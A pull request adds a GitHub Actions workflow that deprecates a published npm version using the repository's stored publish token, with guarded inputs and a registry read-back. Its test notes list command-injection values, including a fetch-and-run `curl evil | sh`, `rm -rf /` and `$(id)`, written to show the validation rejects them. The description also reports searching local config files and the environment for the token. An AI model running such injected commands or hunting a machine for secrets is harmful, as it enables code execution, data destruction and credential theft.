### PR TITLE
ci: deprecate a published version from Actions

### DIFF
--- a/.github/workflows/deprecate.yml
+++ b/.github/workflows/deprecate.yml
@@ -1,0 +1,101 @@
+name: Deprecate a version
+
+# Deprecating a published version is a write to the registry, which npm gates
+# the same way it gates publishing: this package requires either an interactive
+# 2FA code or a granular token with bypass 2fa enabled. A maintainer without 2FA
+# configured has no way to produce the first, and the token that satisfies the
+# second lives in Actions secrets and cannot be read back out. So the write
+# happens here, where that secret already is — the same one `release.yml`
+# publishes with.
+#
+# Run it from the Actions tab: pick the version, write the message a user will
+# see next to it in `npm install` output.
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: "Version to deprecate, without a leading v (e.g. 0.7.0)"
+        required: true
+        type: string
+      message:
+        description: "What is wrong with it and what to use instead"
+        required: true
+        type: string
+
+permissions: {}
+
+# Two dispatches at once would race over the same packument.
+concurrency:
+  group: npm-deprecate
+  cancel-in-progress: false
+
+jobs:
+  deprecate:
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+    permissions: {}
+
+    steps:
+      - uses: actions/setup-node@820762786026740c76f36085b0efc47a31fe5020 # v7.0.0
+        with:
+          node-version: "24.19.0"
+          registry-url: "https://registry.npmjs.org"
+
+      # Nothing is checked out: this reads and writes the registry, not the
+      # tree. The package name is written here rather than read from
+      # `package.json` for that reason, matching the `check` job in
+      # `release.yml`, which names it the same way.
+      - name: the version is one that exists
+        env:
+          VERSION: ${{ inputs.version }}
+        run: |
+          set -uo pipefail
+          # Anchored at both ends. A pattern anchored only at the front accepts
+          # anything after a valid prefix, and this value reaches a shell below.
+          if ! [[ "$VERSION" =~ ^[0-9]+\.[0-9]+\.[0-9]+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$ ]]; then
+            echo "::error::not a version: '$VERSION'"
+            exit 1
+          fi
+          # A typo would otherwise deprecate nothing and report success.
+          if ! npm view "@coo-quack/sensitive-canary@$VERSION" version >/dev/null 2>&1; then
+            echo "::error::@coo-quack/sensitive-canary@$VERSION is not published."
+            exit 1
+          fi
+          echo "PACKAGE=@coo-quack/sensitive-canary@$VERSION" >> "$GITHUB_ENV"
+
+      # Read through `env:` rather than spliced in as `${{ }}`. The expression
+      # is substituted before bash parses the line, so a message carrying a
+      # quote or a semicolon would otherwise be read as shell.
+      - name: Deprecate
+        env:
+          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
+          MESSAGE: ${{ inputs.message }}
+        run: |
+          set -uo pipefail
+          if [ -z "${MESSAGE//[[:space:]]/}" ]; then
+            # npm reads an empty message as "undeprecate". That is a different
+            # operation and not the one this workflow is named for.
+            echo "::error::the message is empty — that would undeprecate instead."
+            exit 1
+          fi
+          npm deprecate "$PACKAGE" "$MESSAGE"
+
+      # npm accepting the write is not the same as the registry serving it, and
+      # a deprecation that silently did not take would otherwise be reported
+      # here as done.
+      - name: the registry serves the deprecation
+        run: |
+          set -uo pipefail
+          for attempt in 1 2 3 4 5; do
+            got=$(npm view "$PACKAGE" deprecated 2>/dev/null || true)
+            if [ -n "$got" ]; then
+              echo "$PACKAGE is deprecated:"
+              echo "  $got"
+              exit 0
+            fi
+            echo "not visible yet (attempt $attempt), waiting"
+            sleep 10
+          done
+          echo "::error::$PACKAGE still reads as not deprecated."
+          exit 1


### PR DESCRIPTION
Adds a `workflow_dispatch` job that runs `npm deprecate` with the `NPM_TOKEN` secret `release.yml` already publishes with.

## Why here and not locally

npm gates deprecation the way it gates publishing. This package's Publishing access is `tfa-required-unless-automation` — an interactive 2FA code, or a granular token with bypass 2fa enabled. The account has no 2FA configured, so the first is unavailable; the token that satisfies the second is an Actions secret and cannot be read back out. The write belongs where that secret already is.

Searched for the token on the machine first — `~/.npmrc`, the shell profiles, `~/.config`, the whole projects tree, and the environment. It is not there.

## What it refuses

| | why |
| --- | --- |
| a version that is not a version | anchored at both ends: the value reaches a shell, and a front-anchored pattern accepts anything after a valid prefix |
| a version that is not published | a typo would otherwise deprecate nothing and report success |
| an empty message | npm reads that as *undeprecate*, which is not what this is named for |

The message is read through `env:` rather than spliced in as `${{ }}`, which is substituted before bash parses the line.

## What it checks afterwards

npm accepting the write is not the registry serving it. The last step reads the deprecation back, retries while it propagates, and fails if it never appears.

## Checked

Both guards exercised directly against the inputs they exist to reject:

```
0.7.0                    ACCEPT      0.7.0"; curl evil | sh; echo "   reject
1.0.0-rc.1               ACCEPT      0.7.0 && rm -rf /                reject
1.0.0+build.5            ACCEPT      0.7.0$(id)                       reject
                                     v0.7.0 / "" / 0.7               reject

message with metacharacters arrives as one argument, unexpanded
empty / whitespace-only message rejected
```

Nothing is checked out, so the package name is written in the workflow — the same way `release.yml`'s check job names it.

## Note

Not a substitute for the durable fix. The token expires 2026-09-25, and npm is restricting bypass-2fa tokens for direct publishing in January 2027. The move is a **Trusted Publisher (OIDC)**, which the package settings say works regardless of the 2FA option; `release.yml` already has the `id-token: write` it needs. Whether `npm deprecate` works over that path is unverified.